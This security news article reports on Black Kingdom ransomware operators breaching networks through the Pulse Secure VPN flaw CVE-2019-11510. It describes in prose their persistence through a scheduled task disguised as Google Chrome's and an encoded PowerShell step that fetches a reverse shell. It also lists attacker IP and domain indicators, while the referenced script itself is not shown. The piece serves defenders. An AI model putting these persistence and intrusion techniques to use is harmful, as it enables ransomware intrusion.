Black Kingdom ransomware operators are targeting organizations using unpatched Pulse Secure VPN software to deploy their malware.

Researchers from security firm REDTEAM reported that operators behind the Black Kingdom ransomware are targeting enterprises exploiting the CVE-2019-11510 flaw in Pulse Secure VPN software to gain access to the network.

Black Kingdom ransomware was first spotted in late February by security researcher GrujaRS. the malicious code encrypts files and appends the .DEMON extension to filenames of the encrypted documents.

Early this year, the U.S. Department of Homeland Security’s Cybersecurity and Infrastructure Security Agency (CISA) warned organizations that attackers continue to exploit the well known Pulse Secure VPN vulnerability tracked as CVE-2019-11510.

The CVE-2019-11510 flaw in Pulse Connect Secure is a critical arbitrary file read vulnerability.

“Unauthenticated remote attacker with network access via HTTPS can send a specially crafted URI to perform an arbitrary file reading vulnerability.” reads the advisory.

The vulnerability could be easily exploitable by using publicly available proof-of-concept code. The flaw can be used in combination with the CVE-2019-11539 remote command injection issue gain access to private VPN networks.

Malicious Code

The vulnerability was addressed in April 2019, but many organizations delayed updating their servers.

Researchers from security firm REDTEAM discovered that the Black Kingdom ransomware Black Kingdom ransomware establishes persistence by impersonating a legitimate scheduled task for Google Chrome. Attackers used a name that differs from the legitimate task for a single letter:

GoogleUpdateTaskMachineUSA – Black Kingdom task

GoogleUpdateTaskMachineUA – legitimate Google Chrome task

Redteam researchers published an analysis detailing TTPs and IOC for the Black Kingdom ransomware.

“Attackers gained initial access to the infrastructure via Pulse Secure VPN vulnerability [https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11510]. For persistence they use a scheduled task [https://attack.mitre.org/techniques/T1053/].” reads the analysis published by Redteam. “Task name is GoogleUpdateTaskMachineUSA, which resembles a legitimate task of Google Chrome that ends with UA, not USA. “

REDTEAM researchers reported that the scheduled task runs a Base64-encoded string code in a hidden PowerShell window to fetch a script named “reverse.ps1” that establishes a reverse shell on the infected machine.

Below the content of the cversions_cache.ps1 powershell script:

The “reverse.ps1” script resides at 198.13.49[.]179, which is operated by the Choopa provider that was used by other cybercriminal gangs.

“It [198.13.49[.]179] resolves to three domains, the third one being connected to other servers in the U.S. and Italy hosting Android and cryptocurrency mining malware.” reported BleepingComputer.

  • host.cutestboty.com
  • keepass.cutestboty.com
  • anno1119.com

Below the ransom note asking dropped by the ransomware on the infected hosts. The operators demanded $10,000 worth of Bitcoin to decrypt the files and avoid that they will be destroyed or sold.

Pierluigi Paganini